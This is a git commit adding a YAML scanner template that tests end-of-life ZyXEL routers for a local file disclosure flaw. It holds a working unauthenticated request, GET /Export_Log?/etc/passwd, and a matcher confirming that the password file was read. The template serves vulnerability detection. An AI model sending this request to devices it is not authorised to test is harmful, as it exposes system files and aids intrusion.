Create zyxel-exportlog-lfd.yaml

2022-12-15 13:32:26 +00:00 · 2022-12-15 13:32:26 +00:00 · ee562e420d
parent 2a44b0c721
commit ee562e420d
1 changed files with 30 additions and 0 deletions
--- a/vulnerabilities/zyxel/zyxel-exportlog-lfd.yaml
+++ b/vulnerabilities/zyxel/zyxel-exportlog-lfd.yaml
@ -0,0 +1,30 @@
+id: zyxel-exportlog-lfd
+
+info:
+  name: Multiple ZyXEL routers local file disclosure.
+  author: EvergreenCartoons
+  severity: critical
+  description: |
+    Many EOL ZyXEL routers contain multiple vulnerabilities. This template tests for a local file disclosure issue. 
+  reference:
+    - https://sec-consult.com/blog/detail/enemy-within-unauthenticated-buffer-overflows-zyxel-routers/
+    - https://sec-consult.com/vulnerability-lab/advisory/multiple-critical-vulnerabilities-in-multiple-zyxel-devices/
+    - https://github.com/rapid7/metasploit-framework/pull/17388
+  tags: zyxel,lfd,msf
+
+requests:
+  - raw:
+      - |
+        GET /Export_Log?/etc/passwd HTTP/1.1
+        Host: {{Hostname}}
+        Accept: */*
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "root:.*:0:0:"
+
+      - type: status
+        status:
+          - 200